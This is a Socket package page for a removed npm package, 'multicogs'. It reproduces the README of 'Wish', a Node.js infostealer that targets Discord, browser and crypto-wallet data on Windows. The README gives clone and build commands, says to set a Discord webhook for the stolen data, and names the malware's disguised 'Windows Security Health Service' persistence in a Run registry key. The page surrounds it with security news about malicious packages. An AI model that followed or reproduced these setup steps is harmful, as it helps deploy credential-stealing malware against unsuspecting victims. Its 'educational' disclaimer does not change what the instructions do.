
Research
Security News
Malicious npm Packages Use Telegram to Exfiltrate BullX Credentials
Socket uncovers an npm Trojan stealing crypto wallets and BullX credentials via obfuscated code and Telegram exfiltration.
Node.js malware for Windows that steals data from Discord, browsers, and crypto wallets, affecting all users.
The most comprehensive open-source stealer based on Node.js available on GitHub. 🚀 This Discord stealer utilizes a privilege escalation technique to gain access to all user sessions on Windows. 🔑
Download Node.js
Visit the official Node.js LTS page to download the Long-Term Support (LTS) version.For Visual Studio 2019 or later
Install the Desktop development with C++
workload via Visual Studio Community.For versions earlier than Visual Studio 2019
Use the Visual Studio Build Tools and select the Visual C++ build tools
option during installation.JavaScript, in its native form, lacks direct control over hardware. Therefore, this project relies on modules that utilize C++
, which does provide direct access to hardware components. By leveraging the node-gyp library, I can interface with C++
and perform operations that JavaScript cannot accomplish directly.
to correctly install node-gyp go to its repo: node-gyp
Follow these steps to have it or watch the video YouTube!
Install Git and then use these commands in the console.
CMD
with Administrator Permissions
git clone https://github.com/k4itrun/wish.git
npm run builder:install && npm run builder:start
config.js
for your Discord webhook and crypto addresses.git clone https://github.com/k4itrun/wish.git
npm run src:install && npm run src:start
electron-builder
, pkg
, nexe
, etc...) to build your own executable.Open PowerShell as Administrator.
Terminate processes:
taskkill /f /t /im Wish.exe
taskkill /f /t /im WindowsSecurityHealthService.exe
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Security Health Service" /f
This project draws inspiration from various infostealers. Special thanks to:
We greatly appreciate any contributions to this project! Whether you want to open new issues, submit pull requests, or share suggestions for improvements, your input is invaluable. We encourage you to refer to our Contributing Guidelines to facilitate a seamless collaboration process.
You can also support the development of this software through a donation, helping me bring new optimal and improved projects to life.
Thank you for your interest and support! ✌️
For any inquiries or support, you can reach out via billoneta@proto.me or join our Discord Server.
This software is licensed under the MIT License.
This tool is designed solely for educational purposes. Any misuse of this tool is strictly prohibited. By using this tool, you acknowledge and accept these terms.
By utilizing this tool, you take full responsibility for your actions. The creator disclaims any liability for misuse. It is your responsibility to ensure that your use of this software complies with all applicable laws and regulations.
The creator will not provide assistance or support for any misuse of this tool. Any inquiries related to harmful or illegal activities will be ignored.
By using this tool, you agree to abide by this disclaimer. If you do not agree with these terms, please do not use the software.
FAQs
security holding package
The npm package multicogs receives a total of 60 weekly downloads. As such, multicogs popularity was classified as not popular.
We found that multicogs demonstrated a healthy version release cadence and project activity because the last version was released less than a year ago. It has 0 open source maintainers collaborating on the project.
Did you know?
Socket for GitHub automatically highlights issues in each pull request and monitors the health of all your open source dependencies. Discover the contents of your packages and block harmful activity before you install or update your dependencies.
Research
Security News
Socket uncovers an npm Trojan stealing crypto wallets and BullX credentials via obfuscated code and Telegram exfiltration.
Research
Security News
Malicious npm packages posing as developer tools target macOS Cursor IDE users, stealing credentials and modifying files to gain persistent backdoor access.
Security News
AI-generated slop reports are making bug bounty triage harder, wasting maintainer time, and straining trust in vulnerability disclosure programs.